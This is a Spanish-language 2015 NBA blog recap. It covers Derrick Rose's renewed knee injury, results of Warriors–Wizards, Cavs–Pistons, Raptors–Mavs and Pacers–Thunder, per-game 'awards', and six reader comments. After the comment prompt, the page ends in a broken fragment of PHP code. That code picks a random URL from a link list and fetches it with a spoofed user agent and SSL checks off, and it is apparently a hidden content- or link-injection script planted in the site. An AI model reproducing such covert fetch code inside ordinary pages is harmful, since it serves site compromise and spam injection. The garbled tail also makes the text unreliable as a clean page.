La crónica: Esto no es una elegía

25 de February de 2015 por MagicJohnson32

Esto no es una elegía. No lo es, porque nos resistimos a dar por perdido a Derrick Rose, de nuevo lastimado en esas malditas rodillas que nos han privado de uno de los grandes jugadores de la última década. Nos negamos a renunciar a toda esperanza, a dejar de creer en que será capaz de regresar, una vez más, para electrizar al United Center y levantarnos de nuestros asientos. No es esto una elegía por Derrick Rose, menos aún cuando no conocemos el pronóstico exacto ni el tiempo de recuperación que necesitará tras un nuevo desgarro en el menisco de la rodilla derecha. La lesión es la misma que en 2013 pero hay esperanza de que el desgarro sea menor y Rose pueda estar de vuelta incluso en un par de meses.

Por eso estas líneas no son una elegía. Tampoco lo son para los Bulls, que si algo han probado repetidamente es que se crecen ante las mayores adversidades. Allí donde la tentación sería ondear la bandera blanca y capitular, Thibodeau insufla en sus jugadores una capacidad extraordinaria para superar las expectativas. La lesión de Rose es un mazazo, pero los Bulls no se van a rendir. Y por eso, esto no es una elegía.

La lesión de D-Rose desvía el foco de donde generalmente lo tenemos puesto, que es en la pista. Vale la pena recuperarlo para resumir la jornada de anoche, con cuatro partidos de interés notable.

Golden State Warriors 114 – Washington Wizards 107

Welcome Back, Steph. Un solo partido se ha perdido Curry por un problema en el tobillo, pero ya le echábamos de menos. Los Wizards probablemente habrían preferido otra noche de descanso para el talentoso base de los Warriors, que lideró la victoria de los suyos en Washington con su característico repertorio de tiros lejanísimos y dribblings hipnóticos. Los Wizards ofrecieron una versión mejorada respecto a sus recientes decepciones (suman 4 derrotas seguidas y 8 de los últimos 10) pero la exhibición de Curry, sumada a la productividad de Speights y la diferencia en pérdidas de balón condenaron a los de la capital.

Cleveland Cavaliers 102 – Detroit Pistons 93

La derrota de los Wizards se combinó con una nueva victoria de los Cavs, con lo que se amplía el trecho entre los cuatro primeros del Oeste y la quinta plaza. Los Cavaliers tuvieron que remar para salir victoriosos de Auburn Hills, donde Taysh Prince fue recibido como un héroe en su reestreno como jugador de los Pistons. Reggie Jackson y KCP dominaron a Irving y JR durante buena parte del encuentro, y los Pistons llegaron a acumular 14 puntos de renta. Apareció entonces el Kevin Love de los mejores días (8 triples logró) para bombardear el aro local y anotar 12 puntos en un parcial de 20-3 que dio la vuelta al marcador y lanzó a los Cavs al triunfo. El partido también sirvió para que LeBron James superara a Scottie Pippen como el forward con más asistencias en la historia de la NBA.

Toronto Raptors 92 – Dallas Mavericks 99

Dadas las noticias sobre Derrick Rose y la pésima racha de los Raptors, parece inevitable que los Cavs se alcen en breve y de manera definitiva hasta la segunda posición del Este. Los canadienses cedieron por tercer partido consecutivo, el de anoche en Dallas, pese a la baja de Parsons, los problemas físicos que afectaron a Tyson Chandler y que Rondo protagonizó uno de sus clásicos cruces de cables: ignoró a Carlisle cuando éste le ordenó una jugada y discutió con su entrenador en el tiempo muerto posterior, lo que llevó al base al banquillo lo que restaba de encuentro. De hecho, en ese momento, los Mavs perdían 62-53, y el banquillazo a Rondo pareció activar al conjunto texano. Tal vez tuvo más que ver el cansancio de los Raptors, que jugaban su cuarto partido a domicilio en 5 noches y se hundieron en el tramo final.

Indiana Pacers 92 – Oklahoma City Thunder 105

¿En qué punto deberíamos empezar a considerar a Russell Westbrook para el MVP? Tal vez ya haya llegado el momento. El base de los Thunder logró un nuevo triple doble en 28 minutos, sin siquiera jugar en el último cuarto, y tiene a los Thunder a la caza de la séptima posición del Oeste con 9 victorias en los últimos 10 partidos. Anoche sometió a los Pacers, que hicieron la goma hasta que encajaron un parcial de 4-21 entre el final del tercer y el arranque del último cuarto. Ibaka también confirmó su excelente estado de forma con 23 puntos, 10 rebotes y 3 tapones, Enes Kanter aportó 15-5 y las angustias de los Thunder por acceder a los Playoffs ya parecen historia.

PREMIOS

MVP: El triple doble de Westbrook, 20 puntos, 11 rebotes y 10 asistencias, no alcanza ante la magnífica actuación de Stephen Curry en Washington. 32 puntos, con 11 de 18 en tiros de campo, además de 8 asistencias y 2 robos sin una sola pérdida de balón.

Rookie: Mitch McGary, cada día más sólido, anotó anoche 9 puntos, con 8 rebotes, 2 robos y 2 tapones.

Sorpresa: Carlisle sentó a Rondo y tiró de Devin Harris cuando el partido pintaba cuesta arriba. Respondió Harris con 14 puntos, 3 rebotes, 5 asistencias, 4 recuperaciones y un papel clave en la victoria de los Mavs.

Decepción: Nada nos ha decepcionado más que saber de la lesión de Derrick Rose.

Mayor esfuerzo en vano: Stan Van Gundy le da cuerda a Reggie Jackson y ya empieza a rendir. 22 puntos, 8 rebotes y 9 asistencias logró el nuevo Piston ante los Cavs.

Top 10

Imágenes | AP Photos / Getty Images

Comenta

6 comentarios a esta entrada

  1. luismi_vallecas dice:
    #1

    Me da muchísima pena Derrick Rose. Cada vez parece más un Brandon Roy II. Espero que no llegue a ese extremo

      Citar

  2. jhc dice:
    #2

    Buaff… lo de este chico yo creo que es crónico, una pena, un grandisimo jugador chafado por tantas lesiones

      Citar

  3. guisante dice:
    #3

    Irrecuperable.

    Las dos ultimas temporadas ya se le vió una tendencia con pendiente negativa, especialmente esta temporada donde no ha conseguido ser regular y donde por una causa u otra las lesiones siempre han estado presentes. Además, con un juego bastante físico como el que é tenía en las primeras temporadas, no creo que consiga volver al nivel all star que fue.

    Ojalá me equivoque, por cierto.

      Citar

  4. Ruxixón dice:
    #4

    Love el nuevo Tolliver,sólo tirando de 3,madre mía.Fenómeno resultado pero se está infrautilizando un jugador capaz de hacer más cosas sobre la cancha.En fin,buena remontada,la verdad pintaba mal la cosa cuando los Pistons se fueron 14 arriba,pero acto seguido Cleveland se puso el mono de trabajo y consiguió la victoria.Un gustazo el ambiente por el Palace y como mola ver a Caldwell-Pope consolidándose como un jugador a tener en cuenta en los Pistons.A ver qué pasa en el verano con Monroe pero a estas alturas da la sensación que se retrocedería varios pasos si decide cambiar de aires.

    Una pena lo de Rose.

      Citar

  5. Azabel dice:
    #5

    Ruxixón:
    Love el nuevo Tolliver,sólo tirando de 3,madre mía.Fenómeno resultado pero se está infrautilizando un jugador capaz de hacer más cosas sobre la cancha.En fin,buena remontada,la verdad pintaba mal la cosa cuando los Pistons se fueron 14 arriba,pero acto seguido Cleveland se puso el mono de trabajo y consiguió la victoria.Un gustazo el ambiente por el Palace y como mola ver a Caldwell-Pope consolidándose como un jugador a tener en cuenta en los Pistons.A ver qué pasa en el verano con Monroe pero a estas alturas da la sensación que se retrocedería varios pasos si decide cambiar de aires.

    Una pena lo de Rose.

    ya lo dije no hace muchol, love con ese peso y esa defensa. sumado a que solo tira triples en ataque se esta volviendo un Steve Novak de la vida, solo lo salva y creo que por eso no esta siendo tan criticado, que esta bajando bastantes rebotes, eso si que sigue haciendolo y bastante bien

      Citar

  6. Futurman dice:
    #6

    Falta que hagan alguna jugada para él al poste. Lo razonable sería que en el partido se distribuyesen entre los tres los tiros (como hacen), que Love coja tiros en el 1º y 3er cuarto, Irving en el 2º y 4º y Lebron cuando quiera xD

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>